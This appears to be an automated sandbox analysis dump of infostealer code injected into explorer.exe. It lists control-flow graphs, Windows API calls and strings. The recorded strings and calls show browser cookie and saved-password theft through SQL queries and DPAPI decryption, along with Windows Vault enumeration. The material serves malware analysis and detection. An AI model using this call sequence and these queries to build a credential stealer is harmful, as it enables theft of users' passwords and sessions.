28154->28161 28157 8479c 23 API calls 28158 84813 28157->28158 28159 8479c 23 API calls 28158->28159 28160 8481f 28159->28160 28162 81afe 10 API calls 28161->28162 28163 847af 28162->28163 28164 847f1 28163->28164 28165 8199d 9 API calls 28163->28165 28164->28157 28167 847bf 28165->28167 28166 847ea 28168 81011 3 API calls 28166->28168 28167->28166 28169 81d4a 18 API calls 28167->28169 28168->28164 28169->28167 28437 849f1 13 API calls 28546 a13ca 62 API calls 28547 99ff0 32 API calls 28438 8d1f7 memset _allmul _allmul

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 83717-83730 call 81b6a 3 83736-8374c 0->3 4 83c37-83c3d 0->4 5 8374e-83757 call 8302d 3->5 6 83762-8379c call 81000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->6 10 8375c-8375e 5->10 11 837a8-837b5 call d4bec 6->11 12 8379e-837a3 call 8349b 6->12 10->6 16 837bb-837d3 call beeb8 11->16 17 83c15-83c1e DeleteFileW call 81011 11->17 12->11 22 837d9-837f1 call 81000 call a02ec 16->22 23 83c0c-83c10 call d3848 16->23 21 83c23-83c28 17->21 21->4 24 83c2a-83c32 call 82ffa 21->24 31 83bd0-83be3 call 9fb92 lstrlen 22->31 32 837f7 22->32 23->17 24->4 37 83c05-83c07 call 81011 31->37 38 83be5-83c00 call 81798 * 3 31->38 33 837fc-83816 call 81fa7 32->33 41 8381c-8382d 33->41 42 83bb6-83bc6 call a02ec 33->42 37->23 38->37 45 83833-83843 RtlCompareMemory 41->45 46 83a37-83a51 CryptUnprotectData 41->46 42->33 55 83bcc 42->55 45->46 50 83849-8384b 45->50 46->42 48 83a57-83a5c 46->48 48->42 52 83a62-83a78 call 81fa7 48->52 50->46 54 83851-83856 50->54 61 83a7a-83a80 52->61 62 83a86-83a9d call 81fa7 52->62 54->46 58 8385c-83861 54->58 55->31 58->46 60 83867-838ed RtlZeroMemory call 81000 58->60 73 83a2e-83a32 60->73 74 838f3-83909 call 81fa7 60->74 61->62 64 83a82 61->64 68 83aab-83ac2 call 81fa7 62->68 69 83a9f-83aa5 62->69 64->62 78 83ad0-83aed call 81fa7 68->78 79 83ac4-83aca 68->79 69->68 71 83aa7 69->71 71->68 75 83bb1 call 81011 73->75 83 8390b-83911 74->83 84 83917-8392d call 81fa7 74->84 75->42 90 83aef-83af1 78->90 91 83af7-83b01 78->91 79->78 82 83acc 79->82 82->78 83->84 86 83913 83->86 92 8393b-83952 call 81fa7 84->92 93 8392f-83935 84->93 86->84 90->91 94 83af3 90->94 95 83b0f-83b1b lstrlen 91->95 96 83b03-83b05 91->96 103 83960-83979 call 81fa7 92->103 104 83954-8395a 92->104 93->92 97 83937 93->97 94->91 95->42 100 83b21-83b2a lstrlen 95->100 96->95 99 83b07-83b0b 96->99 97->92 99->95 100->42 102 83b30-83b4f call 81000 100->102 110 83b59-83b93 call 82112 wsprintfA lstrlen 102->110 111 83b51 102->111 112 8397b-83981 103->112 113 83987-83993 lstrlen 103->113 104->103 106 8395c 104->106 106->103 118 83ba3-83baf lstrcat 110->118 119 83b95-83ba1 call 8102f 110->119 111->110 112->113 115 83983 112->115 113->73 117 83999-839a2 lstrlen 113->117 115->113 117->73 120 839a8-839c7 call 81000 117->120 118->75 119->118 125 839c9 120->125 126 839d1-83a0b call 82112 wsprintfA lstrlen 120->126 125->126 129 83a1b-83a29 lstrcat call 81011 126->129 130 83a0d-83a19 call 8102f 126->130 129->73 130->129
                                  APIs
                                    • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                    • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                  • GetTempPathW.KERNEL32(00000104,00000000), ref: 00083778
                                  • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083782
                                  • DeleteFileW.KERNELBASE(00000000), ref: 00083789
                                  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083794
                                  • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0008383B
                                  • RtlZeroMemory.NTDLL(?,00000040), ref: 00083870
                                  • lstrlen.KERNEL32(?,?,?,?,?), ref: 0008398B
                                  • lstrlen.KERNEL32(00000000), ref: 0008399A
                                  • wsprintfA.USER32 ref: 000839F1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 000839FD
                                  • lstrcat.KERNEL32(00000000,?), ref: 00083A21
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00083A49
                                  • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00083B13
                                  • lstrlen.KERNEL32(00000000), ref: 00083B22
                                  • wsprintfA.USER32 ref: 00083B79
                                  • lstrlen.KERNEL32(00000000), ref: 00083B85
                                  • lstrcat.KERNEL32(00000000,?), ref: 00083BA9
                                  • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00083BDA
                                  • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00083C16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                  • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                  • API String ID: 584740257-404540950
                                  • Opcode ID: db6ce6ab68a3e9764131aac09ebcdc44c456b69e7b9ac3fe299efac07930bcfc
                                  • Instruction ID: 670c89e043a30e7cd80d5367027ab5f5eb9d687dfe2f4516304c8600e554ace9
                                  • Opcode Fuzzy Hash: db6ce6ab68a3e9764131aac09ebcdc44c456b69e7b9ac3fe299efac07930bcfc
                                  • Instruction Fuzzy Hash: 1DE19B70209341AFE715EF24C884AAFBBE9BFC5B44F04482DF9C586252DB79C905CB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 134 82198-821c9 RtlZeroMemory GetVersionExW 135 821cb-821d0 134->135 136 821d7-821dc 134->136 137 821de 135->137 138 821d2 135->138 136->137 139 821e3-821f6 LoadLibraryW 136->139 137->139 138->136 140 8249b-824a3 139->140 141 821fc-8223e GetProcAddress * 5 139->141 142 82492-8249a FreeLibrary 141->142 143 82244-8224a 141->143 142->140 143->142 144 82250-82252 143->144 144->142 145 82258-8225a 144->145 145->142 146 82260-82265 145->146 146->142 147 8226b-82277 146->147 148 8227e-82280 147->148 148->142 149 82286-822a5 148->149 151 8248b-8248f 149->151 152 822ab-822b3 149->152 151->142 153 822b9-822c5 152->153 154 82483 152->154 155 822c9-822db 153->155 154->151 156 822e1-822f1 RtlCompareMemory 155->156 157 82365-82375 RtlCompareMemory 155->157 159 82452-82475 156->159 160 822f7-82348 call 81953 * 3 156->160 158 8237b-823c9 call 81953 * 3 157->158 157->159 176 823cb-823dc call 81953 158->176 177 823e4-823ea 158->177 159->155 161 8247b-8247f 159->161 160->177 178 8234e-82363 call 81953 160->178 161->154 190 823e0 176->190 181 823ec-823ee 177->181 182 82431-82433 177->182 178->190 187 8242a-8242c call 81011 181->187 188 823f0-823f2 181->188 184 8243c-8243e 182->184 185 82435-82437 call 81011 182->185 192 82440-82442 call 81011 184->192 193 82447-82449 184->193 185->184 187->182 188->187 194 823f4-823f6 188->194 190->177 192->193 193->159 197 8244b-8244d call 81011 193->197 194->187 196 823f8-82406 StrStrIW 194->196 198 82408-82421 call 817c0 * 3 196->198 199 82426 196->199 197->159 198->199 199->187
                                  APIs
                                  • RtlZeroMemory.NTDLL(?,00000114), ref: 000821AF
                                  • GetVersionExW.KERNEL32(?), ref: 000821BE
                                  • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000821E8
                                  • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0008220A
                                  • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00082214
                                  • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00082220
                                  • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0008222A
                                  • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00082236
                                  • RtlCompareMemory.NTDLL(?,000E1110,00000010), ref: 000822E8
                                  • RtlCompareMemory.NTDLL(?,000E1110,00000010), ref: 0008236C
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                  • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000823FE
                                  • FreeLibrary.KERNELBASE(00000000), ref: 00082493
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                  • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                  • API String ID: 2583887280-2831467701
                                  • Opcode ID: 2c67f8b11e6fd3aab0010db11284c43f56d8013b8eb1cf378e18b5c8592d3f89
                                  • Instruction ID: 98d066dbc322e4484caac54a837068d24d4d34c7b6dd7bdaef90f102b542e3a8
                                  • Opcode Fuzzy Hash: 2c67f8b11e6fd3aab0010db11284c43f56d8013b8eb1cf378e18b5c8592d3f89
                                  • Instruction Fuzzy Hash: 5A918B71A083009FD754EF65C884AAFBBEABF98704F00482EF9C597251EB75D941CB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 261 83098-830b1 call 81b6a 264 833ba-833c0 261->264 265 830b7-830cd 261->265 266 830cf-830d8 call 8302d 265->266 267 830e3-83128 call 81000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call d4bec 265->267 270 830dd-830df 266->270 274 8339b-833a4 DeleteFileW call 81011 267->274 275 8312e-83146 call beeb8 267->275 270->267 278 833a9-833ab 274->278 281 8314c-83158 call a02ec 275->281 282 83392-83396 call d3848 275->282 278->264 280 833ad-833b5 call 82ffa 278->280 280->264 287 83389-8338d call 9fb92 281->287 288 8315e-83161 281->288 282->274 287->282 289 83165-8317f call 81fa7 288->289 293 8336f-8337b call a02ec 289->293 294 83185-83196 289->294 293->289 303 83381-83385 293->303 295 8319c-831ac RtlCompareMemory 294->295 296 832cd-832e7 CryptUnprotectData 294->296 295->296 299 831b2-831b4 295->299 296->293 298 832ed-832f2 296->298 298->293 301 832f4-8330a call 81fa7 298->301 299->296 302 831ba-831bf 299->302 308 83318-8332f call 81fa7 301->308 309 8330c-83312 301->309 302->296 305 831c5-831ca 302->305 303->287 305->296 307 831d0-83253 RtlZeroMemory call 81000 305->307 321 832bd 307->321 322 83255-8326b call 81fa7 307->322 315 8333d-83343 308->315 316 83331-83337 308->316 309->308 311 83314 309->311 311->308 318 83351-8336a call 81798 * 3 315->318 319 83345-8334b 315->319 316->315 320 83339 316->320 318->293 319->318 324 8334d 319->324 320->315 323 832c1-832c8 call 81011 321->323 330 83279-8328e call 81fa7 322->330 331 8326d-83273 322->331 323->293 324->318 339 8329c-832bb call 81798 * 3 330->339 340 83290-83296 330->340 331->330 334 83275 331->334 334->330 339->323 340->339 341 83298 340->341 341->339
                                  APIs
                                    • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                    • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                  • GetTempPathW.KERNEL32(00000104,00000000), ref: 000830F9
                                  • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083103
                                  • DeleteFileW.KERNELBASE(00000000), ref: 0008310A
                                  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083115
                                  • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000831A4
                                  • RtlZeroMemory.NTDLL(?,00000040), ref: 000831D7
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000832DF
                                  • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0008339C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                  • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                  • API String ID: 2757140130-4052020286
                                  • Opcode ID: 7b8a3af755972ef78207df5a19dd5ecacb4dc09b70ee8be2efa8515fb43bf584
                                  • Instruction ID: 9eeee0a49cad79a680b91747a9da1137e025b2c57e8320bddd38074415eb84c5
                                  • Opcode Fuzzy Hash: 7b8a3af755972ef78207df5a19dd5ecacb4dc09b70ee8be2efa8515fb43bf584
                                  • Instruction Fuzzy Hash: 0691AD71208341ABE710EF64C844AAFBBE9BFC5B44F04092DF9C596252DB75DE05CB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 348 83ed9-83ee7 349 83eed-83ef1 348->349 350 83fd1-83fdb 348->350 349->350 351 83ef7-83f21 call 81000 PathCombineW FindFirstFileW 349->351 354 83fca-83fcc call 81011 351->354 355 83f27-83f30 351->355 354->350 356 83f78-83f86 lstrcmpiW 355->356 357 83f32-83f40 lstrcmpiW 355->357 359 83faf-83fbd FindNextFileW 356->359 361 83f88-83fa3 call 81000 PathCombineW call 83e04 356->361 357->359 360 83f42-83f54 lstrcmpiW 357->360 359->355 362 83fc3-83fc4 FindClose 359->362 360->359 363 83f56-83f76 call 81000 PathCombineW call 83ed9 360->363 370 83fa8-83faa call 81011 361->370 362->354 363->370 370->359
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 00083F0A
                                  • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00083F16
                                  • lstrcmpiW.KERNEL32(?,000D62CC), ref: 00083F38
                                  • lstrcmpiW.KERNEL32(?,000D62D0), ref: 00083F4C
                                  • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00083F69
                                  • lstrcmpiW.KERNEL32(?,Local State), ref: 00083F7E
                                  • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00083F9B
                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00083FB5
                                  • FindClose.KERNELBASE(00000000), ref: 00083FC4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                  • String ID: *.*$Local State
                                  • API String ID: 3923353463-3324723383
                                  • Opcode ID: c5aaf5cf6c109a5247499879bb6aba34656f063be9491def208fa3bdd5a4ad27
                                  • Instruction ID: 4d7f345a5cfc812a584ff706badc4d4ef345a41b1eec5ce1d2c75e72a3eebf84
                                  • Opcode Fuzzy Hash: c5aaf5cf6c109a5247499879bb6aba34656f063be9491def208fa3bdd5a4ad27
                                  • Instruction Fuzzy Hash: 3E21A1306007446BE750BB309C48ABF7BACBFC5B01B04052AFE92C6193DB7A994987B1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 373 81d4a-81d5c 374 81d62-81d66 373->374 375 81eb4-81ebe 373->375 374->375 376 81d6c-81d77 call 819b4 374->376 379 81d79-81d89 call 81953 376->379 380 81d8b-81d97 call 81953 376->380 385 81d9b-81d9d 379->385 380->385 385->375 386 81da3-81db4 FindFirstFileW 385->386 387 81dba 386->387 388 81ead-81eaf call 81011 386->388 389 81dbe-81dc3 387->389 388->375 391 81e3d-81e6a call 81953 call 8199d lstrcmpiW 389->391 392 81dc5-81dd7 lstrcmpiW 389->392 403 81e6c-81e75 call 81cf7 391->403 404 81e87-81e89 call 81011 391->404 394 81ddd-81def lstrcmpiW 392->394 395 81e8e-81e9c FindNextFileW 392->395 394->395 397 81df5-81e00 call 819b4 394->397 395->389 398 81ea2-81ea9 FindClose 395->398 405 81e09 397->405 406 81e02-81e07 397->406 398->388 403->404 412 81e77-81e7f 403->412 404->395 408 81e0b-81e3b call 81953 call 8199d call 81d4a 405->408 406->408 408->404 412->404
                                  APIs
                                    • Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4
                                  • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00081DA9
                                  • lstrcmpiW.KERNEL32(?,000D62CC), ref: 00081DCF
                                  • lstrcmpiW.KERNEL32(?,000D62D0), ref: 00081DE7
                                  • lstrcmpiW.KERNEL32(?,?), ref: 00081E62
                                    • Part of subcall function 00081CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00082C27), ref: 00081D02
                                    • Part of subcall function 00081CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00081D0D
                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081E94
                                  • FindClose.KERNELBASE(00000000), ref: 00081EA3
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                  • String ID: *.*$\*.*
                                  • API String ID: 232625764-1692270452
                                  • Opcode ID: 65a225ab1a58f3f422f0424303caeb68fc7b63a73906993df938be3e58dc8cfd
                                  • Instruction ID: 283d2ebab425d3c3d28c1f47b27243124ba92c37555bb5800a8c20e13b937d5b
                                  • Opcode Fuzzy Hash: 65a225ab1a58f3f422f0424303caeb68fc7b63a73906993df938be3e58dc8cfd
                                  • Instruction Fuzzy Hash: E93185303043415BDB61BB749898AEF7BEEBFC4350F044929EDC683256DB7588468761

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 509 83e04-83e11 call 81b6a 512 83ed4-83ed8 509->512 513 83e17-83e22 call 81c31 509->513 513->512 516 83e28-83e34 call 82fb1 513->516 519 83ec8-83ecc 516->519 520 83e3a-83e4f call 8123b 516->520 519->512 523 83ec0-83ec7 call 81011 520->523 524 83e51-83e58 520->524 523->519 526 83e5a-83e6a 524->526 527 83ebf 524->527 528 83eb8-83eba call 81011 526->528 529 83e6c-83e7c RtlCompareMemory 526->529 527->523 528->527 529->528 531 83e7e-83ea6 CryptUnprotectData 529->531 531->528 533 83ea8-83ead 531->533 533->528 534 83eaf-83eb3 533->534 534->528
                                  APIs
                                    • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                    • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                    • Part of subcall function 00081C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00081C46
                                    • Part of subcall function 00081C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00083FA8), ref: 00081C56
                                    • Part of subcall function 00081C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00081C76
                                    • Part of subcall function 00081C31: CloseHandle.KERNEL32(00000000), ref: 00081C91
                                    • Part of subcall function 00082FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00082FC1
                                    • Part of subcall function 00082FB1: lstrlen.KERNEL32("encrypted_key":",?,00083FA8), ref: 00082FCE
                                    • Part of subcall function 00082FB1: StrStrIA.SHLWAPI("encrypted_key":",000D692C), ref: 00082FDD
                                    • Part of subcall function 0008123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00083E4B,00000000), ref: 0008124A
                                    • Part of subcall function 0008123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00081268
                                    • Part of subcall function 0008123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00081295
                                  • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00083E74
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00083E9E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                  • String ID: $DPAP$DPAP$IDPAP
                                  • API String ID: 3076719866-957854035
                                  • Opcode ID: b0c9ea34d8e176138a4a73a84b9b7ce8b8ee6a350bc51f57f81c0e8e45a0d846
                                  • Instruction ID: ebab245d5ddaada603f61cb381ac118924196a51c06e8ba3113981eb9092ee89
                                  • Opcode Fuzzy Hash: b0c9ea34d8e176138a4a73a84b9b7ce8b8ee6a350bc51f57f81c0e8e45a0d846
                                  • Instruction Fuzzy Hash: 422142726043456BD711FA68CC80ABFB6DDBFD4B10F44052EF985D6242EB78CE458B92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 667 e9247-e9275 668 e9277-e92a3 667->668 669 e92e1-e92eb 667->669 670 e92aa-e92be 668->670 671 e92a5-e92a7 668->671 672 e930e-e9342 669->672 673 e92ed-e92f8 669->673 674 e9238-e9245 671->674 675 e92a9 671->675 676 e9344-e9346 672->676 674->667 675->670 677 e9349-e934c 676->677 678 e9381-e93a5 676->678 677->676 679 e934e-e937a 677->679 680 e958d 678->680 681 e93ab-e93b8 678->681 682 e937c 679->682 683 e93e1 679->683 680->680 684 e93ca-e93cf 681->684 682->678 686 e93e3-e93e7 683->686 685 e93d1 684->685 687 e93d3 685->687 688 e93c0-e93c5 685->688 689 e93e9 686->689 690 e93f4-e93f7 686->690 694 e93d8-e93da 687->694 693 e93c6-e93c8 688->693 695 e93eb-e93f2 689->695 696 e9413-e9418 689->696 691 e93f9-e93fe 690->691 692 e9400-e9402 690->692 691->692 692->694 693->684 693->685 694->686 699 e93dc-e93de 694->699 695->690 695->696 697 e941a-e9423 696->697 698 e942b-e942d 696->698 700 e949a-e949d 697->700 701 e9425-e9429 697->701 702 e942f-e9434 698->702 703 e9436 698->703 699->683 704 e94a2-e94a5 700->704 701->703 702->703 705 e9438-e943b 703->705 706 e9404-e9406 703->706 709 e94a7-e94a9 704->709 710 e943d-e9442 705->710 711 e9444 705->711 707 e940f-e9411 706->707 708 e9408-e940d 706->708 712 e9465-e9474 707->712 708->707 709->704 713 e94ab-e94ae 709->713 710->711 711->706 714 e9446-e9448 711->714 717 e9476-e947d 712->717 718 e9484-e9491 712->718 713->704 719 e94b0-e94cc 713->719 715 e944a-e944f 714->715 716 e9451-e9455 714->716 715->716 716->714 720 e9457 716->720 717->717 721 e947f 717->721 718->718 722 e9493-e9495 718->722 719->709 723 e94ce 719->723 725 e9459-e9460 720->725 726 e9462 720->726 721->693 722->693 724 e94d4-e94d8 723->724 727 e951f-e9522 724->727 728 e94da-e94f0 LoadLibraryA 724->728 725->714 725->726 726->712 730 e9525-e952c 727->730 729 e94f1-e94f6 728->729 729->724 731 e94f8-e94fa 729->731 732 e952e-e9530 730->732 733 e9550-e9580 VirtualProtect * 2 730->733 734 e94fc-e9502 731->734 735 e9503-e9510 GetProcAddress 731->735 736 e9532-e9541 732->736 737 e9543-e954e 732->737 738 e9584-e9588 733->738 734->735 739 e9519-e951c 735->739 740 e9512-e9517 735->740 736->730 737->736 738->738 741 e958a 738->741 740->729 741->680
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_e7000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32cff0085485b113b410e7b3abe0a5548784767886e41f63bb0010d8f190109a
                                  • Instruction ID: dcaca065243f0d70f2ab4f0c9d63f603a6d20bde16016ca0a8fb04a3348964b3
                                  • Opcode Fuzzy Hash: 32cff0085485b113b410e7b3abe0a5548784767886e41f63bb0010d8f190109a
                                  • Instruction Fuzzy Hash: 39A16CB29147D25FDB218E79CCC4AA5BBE1EB52324B2C076CC9E1EB2C2E7605807C751
                                  APIs
                                    • Part of subcall function 00081162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0008116F
                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00084BB6
                                  • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00084BBF
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                  • String ID:
                                  • API String ID: 1675517319-0
                                  • Opcode ID: d0a03c3171f669cc561320088f6ee0b01d3cc8f87ebe377cc262c45c340fd0ba
                                  • Instruction ID: ad46feb75ece9f9ea336e87747d93cc9b1d5618f1d304d4bead63fb95cb474d7
                                  • Opcode Fuzzy Hash: d0a03c3171f669cc561320088f6ee0b01d3cc8f87ebe377cc262c45c340fd0ba
                                  • Instruction Fuzzy Hash: BCE0D83180121167D654BB70FC5DBDB3F9CBF95361F10C525F2D592092CB36C8418760
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 0417845d3711d0a8ab48dba37f0f1e8bfd2c70249a97d61b699baedc1fc7043a
                                  • Instruction ID: 3009fa2e25c99c58cd3ca466f84c0bc78be797b351bcccef6327f5f67131da02
                                  • Opcode Fuzzy Hash: 0417845d3711d0a8ab48dba37f0f1e8bfd2c70249a97d61b699baedc1fc7043a
                                  • Instruction Fuzzy Hash: A7A002795511155BFD4457E4DE0DA1A3718F745702F144545B54586051DD6954048731
                                  APIs
                                  • GetSystemInfo.KERNELBASE(000E20A4,00000001,00000000,0000000A,000D3127,000828DA,00000000,?), ref: 0008BFFC
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: InfoSystem
                                  • String ID:
                                  • API String ID: 31276548-0
                                  • Opcode ID: fbb64045412140bb3376d61c47bde30dc89874f3f158a0a622b249d2581c492c
                                  • Instruction ID: fcf2bef7cef12bb3f0d298ad8fb68d6f40796599fadd71bb1614cf323cac156c
                                  • Opcode Fuzzy Hash: fbb64045412140bb3376d61c47bde30dc89874f3f158a0a622b249d2581c492c
                                  • Instruction Fuzzy Hash: 61E0923178878078F62033B96C07FDA15446B80F20F614625B754BC1CFCFB780805222

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
